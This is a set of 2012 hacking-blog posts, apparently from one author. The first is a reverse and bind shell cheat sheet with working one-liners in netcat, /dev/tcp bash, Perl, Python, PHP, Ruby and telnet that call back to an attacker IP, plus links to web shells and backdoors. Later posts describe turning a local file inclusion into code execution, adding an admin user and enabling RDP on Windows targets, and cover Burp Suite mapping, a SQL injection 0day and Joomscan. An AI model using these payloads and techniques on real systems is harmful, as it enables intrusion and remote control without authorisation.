Friday, January 20, 2012

BIND & BACK CONNECT REFERENCE GUIDE

I previously gave you an introduction into NETCAT and how it can be used to do all kinds of neat things, especially for making connections. I showed you how it can be used to spawn a command shell while making BIND connections as well as while making BACK-CONNECT or REVERSE connections. Now in some cases your netcat attempts will simply fail due to one reason or another and you need to be prepared with a few alternative methods to still get the job done. A good friend of mine recently shared a list he put together from posts and comments scattered across the net. The list was so good I couldn't help but share so others can beneift from this as well. Here are a few alternative methods you can try when your standard connections from your web based shells or netcat just dont seem to be working.

1. NETCAT with GAPING_SECURITY_HOLE enabled:
TARGET: nc 192.168.1.133 8080 -e /bin/bash
ATTACKER: nc -n -vv -l -p 8080

2. NETCAT with GAPING_SECURITY_HOLE disabled:
TARGET: mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER: nc -n -vv -l -p 8080

3. Don’t have NETCAT, then try the /dev/tcp socket method
TARGET: /bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1
ATTACKER: nc -n -vv -l -p 8080

4. Don’t have access to NETCAT or  dev/tcp? We can try using a telnet and backpipe to execute commands, like so:
TARGET: mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
ATTACKER: nc -n -vv -l -p 8080

5. Telnet – Plan B method using piped connections
TARGET: telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
ATTACKER: nc -n -vv -l -p 8080
ATTACKER2: nc -n -vv -l -p 8888

6. Using straight BASH
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7. Inline Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

8. Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec?t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

9. Inline PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

10. Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

11. Using Xterm (if available)
xterm -display 10.0.0.1:1

12. A few Web Shells that have some cool connection and bypassing features built into them:
·         Priv8-2012 PHP web based shell which can be downloaded from packetstorm: http://packetstorm.igor.onlinedirect.bg/UNIX/penetration/priv8-2012-bypass-shell.txt
o   Might need to review the code for a backdoor near top, be warned!
·         Php-findsock-shell- designed to bypass egres filtering, available here: http://pentestmonkey.net/tools/web-shells/php-findsock-shell
·         Weevely- avoid bind shell/reverse shell via console over HTTP communication channel, available here: http://www.garage4hackers.com/f11/weevely-stealth-tiny-php-backdoor-1002.html
·         WeBaCoo – (One of My Favorites) – uses HTTP communication channel and passes commands through cookie parameter. Need to chain commands though due to the nature of it as you cant change directories, available here: http://packetstormsecurity.org/files/108009/webacoo-0.2.zip
Do you have another method which is not listed here? Please let me know by posting a comment or shooting me a message privately as we would like to build this up to be the best online reference out there.

If these methods don’t help you then I am not sure what will. I hope you find this information useful and I hope for at least one person this makes the difference from a mildly successful pentest to an all-out success! Until next time, Enjoy!

Special shout-out to CHEATSON for helping to put this reference material together in one spot!

Monday, January 16, 2012

BURP SUITE - Part VII: LFI Exploit via /PROC/SELF/FD

I have previously shown you several methods for which we can exploit LFI vulnerabilities as well as genaral usage of Burp Suite tool set. I have put together a brief video of one last method I wanted to share with you. The methods used all build upon the previous tutorials only the location is new. We will take advantage of the system shortcuts made available by the /prov/self/fd file system. Once located they can be enumerated to locate log files for potential code injection vector. In the video I will show you an example of this method, sit back and enjoy....

VIDEO:


HR's BURP SUITE PACK - DOWNLOAD (NEW LINK):  http://uppit.com/6fj3c4vxi4xk/HR-BURP-PACK_1.23.12.rar

Tuesday, January 10, 2012

BURP SUITE - Part VI: More Fun Exploiting LFI with PHP:// Filters


OK previously I have shown you a few ways you can exploit LFI vulnerabilities. We covered how to gain shell access through /proc/self/environ, how to read source through php://filters , and also how to gain command execution through log poisoning technique. Now today I am going to show you one last method which is much less known about and even less documented. I am going to show you how we can exploit LFI vulnerabilities by abusing the php://input filter this time. The php://input filter is designed to handle the data from POST request as its argument. If you follow the link above you will find it described as: (php://input) “is a read-only stream that allows you to read raw data from the request body. In the case of POST requests, it is preferable to use php://input instead of $HTTP_RAW_POST_DATA as it does not depend on special php.ini directives”. We will abuse this feature to execute PHP code thanks to the include() vulnerability we are exploiting (in similar fashion to how the /proc/self/environ method works). I have seen this method included in a few tools and I will admit I had to tear FIMAP apart to truly figure out how it was getting this technique to actually work which is why I want to share this with everyone, as I assume I am not the only one who is unaware of this technique and how it can be implemented to successfully turn Local File Inclusion (LFI) into Remote Code Execution (RCE), most notable but certainly not limited to - Windows targets.  I will show you how it works using Burp Suite so you can more clearly see how the requests are formed and code injected manually, here goes…

Pre-requisites:
·         LFI Vulnerability
·         Burp Suite, cURL, Tamper Data, Live HTTP Headers, or some other means to easily make POST requests and control the data sent with it – I will be using Burp Suite for this write up and curl in the bonus video. If you need help in coming up to speed with Burp Suite you might want to check out some of my other tutorials I have done:
·         Updated HR’s Burp Pack Download, available here: http://www.megaupload.com/?d=LP7Z7E2K
·         A Brain J

OK, so today I will be using this method against a Windows target to show you that LFI vulnerabilities can be abused on Windows just as badly as they can on a *nix machine – just because we can’t find /etc/passwd doesn’t mean we can get things going, watch and learn my friends. I will assume after all my previous LFI coverage that you can spot a potential LFI now and know what to look for. We will start from the initial find and work our way to command execution:

OK our initial request for /etc/passwd fails but gives us a few clues that we are up against a Windows machine. This means that /proc/self/environ method is out. You can use “C:\boot.ini” or “C:\WINDOWS\win.ini” as the Windows universal equivalent to /etc/passwd for a simple LFI base file check:

We can then try to find juicy Windows files using my new LFI-WinblowsFileCheck.txt file I added to my Burp Suite download pack (link available at the top and bottom of this tutorial). My new list is especially helpful when the target is also known to be running under XAMPP setup as I personally set things up locally and tested things until I had every possible file I could think of to potentially gain juicy info from.

 In this scenario I was able to find several juicy files which held helpful information, but alas I was not able to successfully gain access to any of the log files. The apache log files caused errors to be thrown which made them unusable and the FTP & Mail log files appear to be on another drive which I can’t successfully access through the LFI. I can use php://filters method to read source code but alas I can only find a few PHP pages even on the site and can’t seem to locate any low hanging fruits by guessing for configuration files L.


Do we give up and move to the next site? Hell no! We never give up and we leave no stone unturned! As we can use php://filters to read source code we will now try one last trick and see if we can abuse another filter which I have yet to introduce you to and that is the php://input filter. This filter is designed to handle data sent via POST request and when we abuse it with our include() vulnerability we can exploit the conditions to turn our LFI into full RCE or Remote Code Execution! In order to get things working we flip our request from a GET request to a POST request. We then replace our file names we have been requesting with php://input and then we place our code below the other header info so it is the data being read by php://input.  

Mini-TuT: 101 on GET vs. POST request because you need to understand how to flip the request properly or it wont work correctly, so here is the minimum you need to understand and get started:
HTTP is a request-response protocol, with many built in methods which allow it make all types of requests. The two most common of those methods are GET and POST requests and is all I will focus on for now...

A GET request fetches data from the web server. Here's an example request:

                GET /index.html?username=joesomebody&passwd=supersecret HTTP/1.1
                Host: www.samplesite.com
                User-Agent: Mozilla/4.0

You don’t need to include anything else as everything for the GET request is in the URL itself and header details. This is where the variance becomes notable as POST requests do send additional data to the web server. Here is an example of a POST request:

                POST /login.php HTTP/1.1
                Host: www. samplesite.com
                User-Agent: Mozilla/4.0
                Content-Length: 39
                Content-Type: application/x-www-form-urlencoded

                username=joesomebody&passwd=supersecret

You can clearly see a difference in the structure of the request. We place a POST instead of a GET obviously with the URL pointing to the page we want to send our data to. We then have our Host header to identify the target site so that when paired with the URL page we get a working link. The User-Agent field is fairly self-explanatory, although it is worth mentioning you can spoof this or even use to inject code in some cases (see some of my other LFI tutorials for examples). We then define the Content-Length which is a count of the characters used in our data stream. The default Content-Type should be set to application/x-www-form-urlencoded followed by a blank line and then you can insert your data to send. POST requests typically alter the web server in some way whereas GET requests do not.

Back to the main TuT…

As in many of my other tutorials I like to start small and then work our way up to full shell access so we begin by just checking to see if we can we use injected code to echo some text to the page (Hood3dRob1n in this case), your request should look similar to this:
NOTE: we use the PHP chr() function to send ascii characters one at a time for the echo command

OK, we can clearly see our text being displayed meaning our echo command was successfully injected. Again this is done because php://input takes the data as an argument and since we are inside of the include() vulnerability it causes the code to become executable. We can now modify our code to inject whatever code you like, just remember in this case it is a Windows environment so commands need to be adjusted accordingly. We can quickly check our user status by issuing a quick “whoami” request, like so:

As you can see we are running in this case as the NT AUTHORITY/SYSTEM user, which is the Windows equivalent of root user. Now we can issue a systeminfo command to see what we have gotten into:

And then follow up with DIR commands and take a look around…

 Now since it is a Windows machine we may or may not be able to use WGET or CURL to get a shell on the target site. If you can’t do this then we will try to use our RCE ability to add a user and then use RDP to simply login and do our thing. In this scenario I can’t load a shell so we will do it the long way. We first check to see who is in the administrator group already with a quick windows command:

OK, so now we need to get our name on the list. We use some more Windows command line kung-fu and add a user to the machine, like so:

Now we check the cool guy list once more to confirm we are now on the list:

w00t – we made to the cool guy group! Ok we are almost done…now that we have admin level user created we will grant them access to the Remote Desktop Users group so we can use RDP to get full GUI access to the site. In order to do this we again alter our commands slighty and add our new user to the group like so:

Now that we have added a user we need to add them to the administrator group so we can get on the cool guy list, we do this by adjusting our command slightly as so:


OK, now we need to open up a command prompt or terminal on our local machine and issue a quick PING request to the target site so we can confirm the IP address to which we will RDP into, should appear something similar to the following (point is to get the sites IP):


 Once we have the IP address for our Windows target we can simply open up our RDP connection manager and connect using our new account credentials we made in the steps outlined above:


At this point you have pretty much got full control thanks to wonderful old Windows. If things fail due to RDP Service not being enabled you can try to inject this command and to enable it:



And if you’re too impatient you can simply restart the machine yourself all though this may cause a few red flags to go off and may also possible lead to data loss on the remote target so use with some caution…

You can use your RDP GUI access to do what you want now or you can do it all from the LFI command execution one by one, whatever floats your boat. This sums up my coverage of the LFI php://input filter technique and how it can be used to exploit Windows systems (It can also be used against *nix but I mainly engage this technique against Windows targets). I hope you have enjoyed this tutorial and as always and until next time – Enjoy!

BONUS VIDEO:
...I should have up in next 24hrs...

Updated HR’s Burp Pack Download, available here: http://www.megaupload.com/?d=LP7Z7E2K

Monday, January 9, 2012

BURP SUITE - PART V: MAPPING THE TARGET

Today I will show you a quick overview of how you can quickly map the web infrastructure for a target website using the tools built into Burp Suite. I probably should have covered this in the beginning as it is a fairly basic task however I seem to get a lot of questions on it, so here we are. We will be focusing on the Target & Spider tabs for this tutorial. I will lay down the steps from setup to run and try to keep it in the usual easy to follow format, here goes…

We will start off as usual by configuring our browser to use proxy on localhost (127.0.0.1) and point it to port 8080 unless you have changed the default settings for Burp to listen on another port (as I have in example below – using 8181 as apache already running on 8080).


Once our browser is properly configured we can fire up Burp Suite by double clicking the jar file. Now we can start capturing our requests from the browser and playing with them within Burp. I like to turn the Interceptor off on the proxy tab so all requests flow as normal and can be easily picked up on the proxy history tab if/when/as needed. Now in order to map the target site we will first need to fire a request in our browser to the root directory of the site (i.e. http://www.targetsite.com/). Once it is run we pick up in Burp, turn off the Interceptor and get ready to start mapping things. You will now navigate to the proxy history tab to review the actual request that was sent. You will right click on the request and choose to “add item to scope”. In doing this we will be defining it as one of our target sites.


I know you can see the “spider from here” and I know it is tempting to jump ahead but if you want to have clear and easy to interpret results then hang tight for just one minute... Now that we have added the target site to our in-scope items we will further define how our spider and target settings will need to be for best results. We start with the Scope sub-tab under the Target tab. Here we can define what is to be considered in-scope. If you’re working on multiple sites or if you know two domains are linked you can add them in here as needed. This will be used to help us filter the results out from all of the other sites which will get drawn from crawling & spidering due to ads, photos, etc. You can add them as outlined above or you can copy and paste your URL links directly into this tab as needed. I should also call out that you can define or set the items to exclude from being considered in-scope. This is helpful in avoiding pages which might cause the crawler/spider to be logged out and thus result in incomplete results. The default settings are fine but this is where you can go in those pesky situations to help fine tune things.

NOTE: the sitemap sub-tab is where all of the results will be presented once the crawling/spidering begins; hang tight and we will come back to that one in a bit…

OK now that we have defined our scope we need to define the options for our crawler or spidering results. These options will define how the crawling is done, how forms are handled, etc. In the first half of the options you can define some general settings like checking for robots.txt file for added info or the crawl depth to use. You can also define the forms and how they are handled in this upper half. This allows you to fill out some basic info once and have it submitted automatically for you anytime the crawler comes across a form it will use smart technology to match as best it can. You can also have it ignore the forms altogether or go into interactive mode and have it prompt you for action on all forms it comes across. If it does have valid credentials then the crawler will obviously get a more in depth scan with more accurate results so if you have the proper credentials then enter them here if not just remember what you submit may show up in a report or in the logs so you may want to change the defaults if you’re on a paid gig ;)



NOTE: If you have a password protected shell getting uploaded to a sight and you can’t seem to find it, the application login prompt for guidance method is a good way to quickly find the link to your missing shell as you can check the links as they are found for authorization pages and then manually inspect to see if it is your shell (it works for me with high degree of success!).

The lower half of the options tab allows you to set the speed at which the spider engine will be running at. Please be aware of your own system limitations before adjusting the thread count to high – the default settings do seem to run fairly effective in most cases. You can also set header level information to be carried in the requests being made while crawling as well as choosing to unclick the HTTP/1.1 box and force communication in older less supported standards.




OK, now that we have everything properly setup for our scan we make one last edit which will make a huge difference in our results and how clear they are to interpret. We go to the Target tab and Sitemap sub-tab to activate our filters. You need to click on the grey area at the top which will expand when you click on it. In the filters section you can have it sort the results based on your liking (server response codes, by MIME types, file type, only parameterized requests - for you injectors out there, etc.). I like to setup the filters as I like them but the biggest most important one is setting to filter only in-scope items. This will block out the extra waste. If you don’t believe me try it without the filters and then try it afterwards again with filters to see how big a difference this small task makes.

It should appear as follows once the filters menu is expanded:


SPECIAL SIDE NOTE: IF you want to save the requests and/or responses from any session you need to define this from the start by clicking on the Options tab and then on the Misc. sub-tab. Here you can choose to log requests, responses, or both if you want. This is helpful if you want to manually review things after your work or if you want to pass the log results to another tool such as SQLMAP to be parsed for possible SQL injection vulnerabilities. If you choose to log anything it will prompt you to name the log file as well as defining the location for storage.


This should get you all setup. We now go back to the Target tab and the Sitemap sub-tab, where you will now see just your target site; right click on it and choose the “Spider this host” option to launch the crawling and spidering process.


Now you sit back and wait for a few minutes while Burp scanner does its thing. You can check the status of a current crawling/spider session by checking the Spider tab and Control sub-tab:


In order to see the final results simply navigate back to the Target tab and the Sitemap sub-tab and you will see all of the found links on the left hand side. You can expand folders and dynamic pages to see what is within them or what options can be passed. You can also see a list of the URL links in the right hand area as shown below:


The example above is rather simple in nature but this is an easy way for you to get a feel for what a site has going on. You can play with the options and the filters to see how it changes the results provided to you and customize to fit your need (for example, in some cases you may want to trace what other sites are communicating to see if you can exploit trust relationships and therefor might not want to filter any results in the sitemap sub-tab so that you can see everything linked). That sums up my brief overview on how you can use Burp Suite to map out a sites infrastructure in a quick and easy manner. You can use the options to your advantage to find authentication forms, lost shells you might have uploaded, or just to get a better picture of what you’re up against.  I encourage you to continue playing around with Burp Suite and all the tools it has to offer. I will continue to work on coming up with new material to share with you on how we can continue to squeeze out more usefulness out of Burp Suite tools, until next time – Enjoy!

PS - my apologies for not including these details in an earlier series for those who felt I left it out you should now have everything you need to get started and on your way with the basics J

MangosWeb SQL Vulnerability - My First 0day!

I was doing an assessment for a friend no his new site and i discovered a SQL POST injection vector via the login form being used in the CMS he had chosen. I worked my way through the site in my usual full detailed approach and when I was done I thought to myself - why is it vulnerable? I checked the CMS he was running and then I decided to start using the power of Google to see if I could find any other sites using the same software. I soon found a working dork which produced a ton of results and low and behold the injection vector seemed to be present on almost all of them I came across. I had to play with the injection syntax to come up with a few universals, but I am happy to say that my work was published to the exploit-db and 1337day exploit database sites - made my year already!

Here are the links to the full details on the exploit:
Exploit-DB: http://www.exploit-db.com/exploits/18335/
1337day: http://www.1337day.com/exploits/17350

The point here is always keep your eyes and ears open as you never know what you might stumble across. If you find a vulnerability in one site, check to see if you found a site specific bug or if you actually found a sotfware bug which then affects multiple sites as opposed to a single site instance. The power of Google is amazing and this goes to show hard work does pay off. I am excited and just wanted to share with everyone else who might be following my blogs. Please check back soon as I have several new tuts in the works and should have new content up very shortly. Until next time, Enjoy!

Monday, January 2, 2012

Joomscan! A Quick way to audit Joomla installs

Today I will briefly introduce you to a tool that has been under development for a while now thanks to OWASP. I bring to you today Joomscan! This is a Perl script which is capable of scanning your Joomla site for common misconfigurations and vulnerabilities. It doesn’t magically exploit them, but it can be a quick way to analyze a sites security and we all know Joomla has its many problems despite it being so popular and easy to use.

In order to get started you will need to first download joomscan.pl from the main OWASP project download page hosted on Source Forge: http://sourceforge.net/projects/joomscan/files/

You will need to edit lines 62 & 63 of the joomscan.pl file so the full path location is set to the actual file location otherwise you will experience errors when immediately running (following the EULA Acceptance & then following the firewall scan):

Once setup properly we can run the Perl script with the –u argument followed by our target site and let it rip (you can ignore the update request and still run just fine):
...

...

...
NOTE: It will beep upon completion so don’t be alarmed :p  

A few additional arguments which can be used:
-          We can quickly check the version running and exit by using the “-pe” argument
-          We can run the request through a proxy using the “-x proxy:port” argument
-          We can log all of the output to a file for review afterwards by adding either the “-ot” or “-oh” arguments which will output in either text or html format.
o   This flag needs to be placed first and before any others to work properly.
o   The text version emulates the terminal results while the HTML output is very clean and presentable (my preference)

COMMAND: joomscan.pl –oh –u http://www.site.com –pe

The output option does not work unless you make it the first argument so make sure your order is right. It took me a few passes to finally figure that bug out. The results of the scan will be saved in the “/report” folder with a filename of “www.target-site-joexploit” (.txt/html), simply open it up to review or present as needed. The text output is pretty much a mirror of the terminal results, while the html output option is something you can actually present to someone with little modification (good for assessments and/or upgrade budget requests). Here is a few quick screenshots:

PRETTY GRAPHS:

PRETTY DETAILED RESULTS:

There is not much more to this tool, it doesn’t test vulnerabilities so you need to follow up manually from here. I just wanted to highlight this tool for those who may be unaware. It allows you to quickly assess your Joomla! site for common misconfigurations and vulnerabilities which can lead to hackers exploiting your site.

Stay patched and until next time – Enjoy!